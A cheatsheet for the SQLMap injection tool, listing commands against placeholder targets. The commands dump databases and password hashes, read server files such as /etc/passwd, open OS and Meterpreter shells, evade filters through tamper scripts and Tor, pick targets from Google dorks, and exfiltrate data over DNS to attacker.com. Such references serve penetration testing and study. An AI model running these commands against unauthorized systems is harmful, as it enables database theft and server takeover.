SQLMap Cheatsheet

The Ultimate SQL Injection Tool Reference Guide

Basic SQLMap Usage

Basic URL Test
sqlmap -u "http://example.com/page.php?id=1"
Test a URL for SQL injection vulnerabilities.
Check for WAF
sqlmap -u "http://example.com" --check-waf
Check if the target is protected by a WAF/IPS/IDS. Note: current sqlmap releases run this heuristic detection automatically and no longer accept --check-waf; use --skip-waf to turn the detection off.
List All Databases
sqlmap -u "http://example.com/page.php?id=1" --dbs
Enumerate available databases.
List Tables
sqlmap -u "http://example.com/page.php?id=1" -D database_name --tables
List tables in a specific database.
Dump Table Data
sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name --dump
Dump the contents of a specific table.
Batch Mode
sqlmap -u "http://example.com/page.php?id=1" --batch
Run in batch mode (use default choices).
Verbose Output
sqlmap -u "http://example.com/page.php?id=1" -v 3
Set verbosity level (0-6, default 1).
Save Options
sqlmap -u "http://example.com/page.php?id=1" --save=sqlmap.conf
Save the current command-line options to a configuration INI file (reload them later with -c sqlmap.conf).
Resume Session
sqlmap -u "http://example.com/page.php?id=1" -s session.sqlite
Load a previously stored session (.sqlite) file. sqlmap also resumes automatically from the session kept in its output directory for the same target.

Target Specification

Direct Connection
sqlmap -d "mysql://user:pass@host:port/dbname"
Connect directly to the database.
Multiple Targets
sqlmap -m targets.txt
Scan multiple targets from a file.
Google Dork
sqlmap -g "inurl:index.php?id="
Process Google dork results as targets.
Log File
sqlmap -l logfile.log
Parse targets from Burp or WebScarab log.
Request File
sqlmap -r request.txt
Load HTTP request from a file.
Crawl Website
sqlmap -u "http://example.com" --crawl=2
Crawl website starting from given URL.
Sitemap
sqlmap -u "http://example.com" --sitemap-url="http://example.com/sitemap.xml"
Parse target(s) from a remote sitemap(.xml) file.

Request Configuration

HTTP Method
sqlmap -u "http://example.com" --method=POST
Force usage of specific HTTP method.
POST Data
sqlmap -u "http://example.com" --data="id=1"
Specify POST data string.
Parameter Testing
sqlmap -u "http://example.com/page.php?id=1&cat=2" -p "id,cat"
Test specific parameter(s) for injection.
Skip Static Parameters
sqlmap -u "http://example.com/page.php?id=1&cat=2" --skip="cat"
Skip testing of specific parameter(s).
Cookie Injection
sqlmap -u "http://example.com" --cookie="id=1" --level=2
Test for cookie-based injection.
User-Agent Injection
sqlmap -u "http://example.com" --user-agent="sqlmap" --level=3
Test for user-agent-based injection.
Referer Injection
sqlmap -u "http://example.com" --referer="http://google.com" --level=3
Test for referer-based injection.
Extra Headers
sqlmap -u "http://example.com" --headers="Accept-Language: fr\nETag: 123"
Add extra HTTP headers to every request (newline-separated; --headers takes the header string itself, not a file name).
HTTP Authentication
sqlmap -u "http://example.com" --auth-type=BASIC --auth-cred="user:pass"
Specify HTTP authentication credentials.
Proxy Usage
sqlmap -u "http://example.com" --proxy="http://127.0.0.1:8080"
Use a proxy to connect to the target.
Tor Routing
sqlmap -u "http://example.com" --tor --tor-type=SOCKS5 --check-tor
Route traffic through Tor network.
Delay Between Requests
sqlmap -u "http://example.com" --delay=1
Delay in seconds between each request.
Timeout
sqlmap -u "http://example.com" --timeout=30
Seconds to wait before timeout (default 30).
Retries
sqlmap -u "http://example.com" --retries=3
Retries when connection times out (default 3).
Random Agent
sqlmap -u "http://example.com" --random-agent
Use randomly selected HTTP User-Agent header.
Host Header
sqlmap -u "http://example.com" --host="custom.example.com"
Specify custom Host header.

Database Enumeration

Current User
sqlmap -u "http://example.com" --current-user
Get database current user.
Current Database
sqlmap -u "http://example.com" --current-db
Get database current database name.
Server Hostname
sqlmap -u "http://example.com" --hostname
Get database server hostname.
Check if DBA
sqlmap -u "http://example.com" --is-dba
Check if current user is DBA.
List Users
sqlmap -u "http://example.com" --users
List database users.
List Privileges
sqlmap -u "http://example.com" --privileges
List database users privileges.
User Password Hashes
sqlmap -u "http://example.com" --passwords
Enumerate user password hashes.
List Roles
sqlmap -u "http://example.com" --roles
List database roles.
List Databases
sqlmap -u "http://example.com" --dbs
List available databases.
List Tables
sqlmap -u "http://example.com" -D database_name --tables
List tables in a specific database.
List Columns
sqlmap -u "http://example.com" -D database_name -T table_name --columns
List columns in a specific table.
Dump Table
sqlmap -u "http://example.com" -D database_name -T table_name --dump
Dump table entries.
Dump Specific Columns
sqlmap -u "http://example.com" -D database_name -T table_name -C column1,column2 --dump
Dump specific columns from a table.
Count Table Entries
sqlmap -u "http://example.com" -D database_name -T table_name --count
Count number of entries in table.
Schema Enumeration
sqlmap -u "http://example.com" --schema
Enumerate database schema.
Search for Data
sqlmap -u "http://example.com" --search -T user
Search for tables/columns matching pattern.
Comments
sqlmap -u "http://example.com" --comments
Enumerate database comments.
DBMS Version
sqlmap -u "http://example.com" --banner
Get DBMS banner/version.

Injection Techniques

Test All Techniques
sqlmap -u "http://example.com" --technique=BEUSTQ
Test all SQL injection techniques (default).
Boolean-Based Blind
sqlmap -u "http://example.com" --technique=B
Boolean-based blind SQL injection.
Error-Based
sqlmap -u "http://example.com" --technique=E
Error-based SQL injection.
UNION Query
sqlmap -u "http://example.com" --technique=U
UNION query-based SQL injection.
Stacked Queries
sqlmap -u "http://example.com" --technique=S
Stacked queries SQL injection.
Time-Based Blind
sqlmap -u "http://example.com" --technique=T
Time-based blind SQL injection.
Inline Queries
sqlmap -u "http://example.com" --technique=Q
Inline queries SQL injection.
Second-Order Injection
sqlmap -u "http://example.com" --second-order="http://example.com/response.php"
Second-order SQL injection.
Test Parameter
sqlmap -u "http://example.com/page.php?id=1&cat=2" -p "id"
Test specific parameter for injection.
Custom Injection Point
sqlmap -u "http://example.com/page.php?id=1*" --prefix="'" --suffix="AND '1'='1"
Specify custom injection point with prefix/suffix.
Tamper Scripts
sqlmap -u "http://example.com" --tamper="between.py,randomcase.py"
Use tamper scripts to obfuscate injection data.
Level and Risk
sqlmap -u "http://example.com" --level=3 --risk=3
Set test level (1-5) and risk (1-3) for more thorough tests.

Optimization Options

Predict Output
sqlmap -u "http://example.com" --predict-output
Predict common queries output.
Keep-Alive
sqlmap -u "http://example.com" --keep-alive
Use persistent HTTP(s) connections.
Null Connection
sqlmap -u "http://example.com" --null-connection
Retrieve page length without actual HTTP response.
Threads
sqlmap -u "http://example.com" --threads=5
Max number of concurrent HTTP requests (1-10).
Optimize
sqlmap -u "http://example.com" -o
Turn on all optimization switches.
Force DNS Resolution
sqlmap -u "http://example.com" --force-dns
Force DNS resolution for all targets.
Fresh Queries
sqlmap -u "http://example.com" --fresh-queries
Ignore query results stored in session file.

Injection Options

DBMS Fingerprint
sqlmap -u "http://example.com" --fingerprint
Perform extensive DBMS version fingerprint.
String to Inject
sqlmap -u "http://example.com" --string="Welcome back"
String to match when query is evaluated to True.
Not String
sqlmap -u "http://example.com" --not-string="Error"
String to match when query is evaluated to False.
Regexp
sqlmap -u "http://example.com" --regexp="Welcome \w+"
Regexp to match when query is evaluated to True.
Code
sqlmap -u "http://example.com" --code=200
HTTP code to match when query is evaluated to True.
Text-Only
sqlmap -u "http://example.com" --text-only
Compare pages based only on the textual content.
Titles
sqlmap -u "http://example.com" --titles
Compare pages based only on their titles.
Union Columns
sqlmap -u "http://example.com" --union-cols=17-23
Range of columns to test for UNION query injection.
Union Char
sqlmap -u "http://example.com" --union-char=123
Character to use for bruteforcing number of columns.
Union From
sqlmap -u "http://example.com" --union-from=users
Table to use in FROM part of UNION query injection.
DNS Exfiltration
sqlmap -u "http://example.com" --dns-domain=attacker.com
Use DNS exfiltration for data retrieval.

Brute Force Options

Brute Force Tables
sqlmap -u "http://example.com" --common-tables
Bruteforce common tables names.
Brute Force Columns
sqlmap -u "http://example.com" --common-columns
Bruteforce common columns names.
Brute Force Files
sqlmap -u "http://example.com" --common-files
Bruteforce common files.
Blind Retrieval Charset
sqlmap -u "http://example.com" --charset="0123456789abcdef"
Restrict the character set used when retrieving data through blind SQL injection (fewer candidate characters means fewer requests); this is not a hash-cracking charset.

File System Access

Read File
sqlmap -u "http://example.com" --file-read="/etc/passwd"
Read a file from the database server.
Write File
sqlmap -u "http://example.com" --file-write="local.txt" --file-dest="/remote/path/remote.txt"
Write a local file on the database server.
Directory List
sqlmap -u "http://example.com" --list-directories="C:/"
List directories on the database server.

Operating System Access

OS Shell
sqlmap -u "http://example.com" --os-shell
Prompt for an interactive OS shell.
OS Pwn
sqlmap -u "http://example.com" --os-pwn
Prompt for an OOB shell, Meterpreter or VNC.
OS Cmd
sqlmap -u "http://example.com" --os-cmd="id"
Execute an OS command.
OS Bof
sqlmap -u "http://example.com" --os-bof
Stored procedure buffer overflow exploitation.
Privilege Escalation
sqlmap -u "http://example.com" --priv-esc
Database process user privilege escalation.
MSF Path
sqlmap -u "http://example.com" --msf-path=/opt/metasploit
Local path where Metasploit Framework is installed.

Windows-Specific Options

Reg Read
sqlmap -u "http://example.com" --reg-read
Read a Windows registry key value.
Reg Add
sqlmap -u "http://example.com" --reg-add
Write a Windows registry key value.
Reg Del
sqlmap -u "http://example.com" --reg-del
Delete a Windows registry key value.
Reg Key
sqlmap -u "http://example.com" --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft"
Specify Windows registry key.
Reg Value
sqlmap -u "http://example.com" --reg-value="InstallPath"
Specify Windows registry key value.
Reg Data
sqlmap -u "http://example.com" --reg-data="C:\Program Files"
Specify Windows registry key value data.
Reg Type
sqlmap -u "http://example.com" --reg-type="REG_SZ"
Specify Windows registry key value type.

Miscellaneous Options

Parse Errors
sqlmap -u "http://example.com" --parse-errors
Parse and display DBMS error messages.
Cleanup
sqlmap -u "http://example.com" --cleanup
Clean up the DBMS from sqlmap specific UDF and tables.
Flush Session
sqlmap -u "http://example.com" --flush-session
Flush session files for current target.
Check Internet
sqlmap -u "http://example.com" --check-internet
Check Internet connection before assessing the target.
Alerts
sqlmap -u "http://example.com" --alert="ALERT"
Run host OS command(s) when SQL injection is found.
Answers
sqlmap -u "http://example.com" --answers="follow=Y"
Set predefined answers to interactive questions (e.g. "quit=N,follow=N").
Beep
sqlmap -u "http://example.com" --beep
Beep on question and/or when SQL injection is found.
Dependencies
sqlmap -u "http://example.com" --dependencies
Check for missing (optional) sqlmap dependencies.
Disable Coloring
sqlmap -u "http://example.com" --disable-coloring
Disable console output coloring.
Google Page
sqlmap -u "http://example.com" --gpage=2
Use Google dork results from specified page number.
Page Compare
sqlmap -u "http://example.com" --page-compare
Compare pages based on their content length.
Skip WAF
sqlmap -u "http://example.com" --skip-waf
Skip heuristic detection of WAF/IPS/IDS protection.
Smart
sqlmap -u "http://example.com" --smart
Conduct thorough tests only if positive heuristic(s).
Sqlmap Shell
sqlmap --sqlmap-shell
Prompt for an interactive sqlmap shell.
Wizard
sqlmap --wizard
Simple wizard interface for beginner users.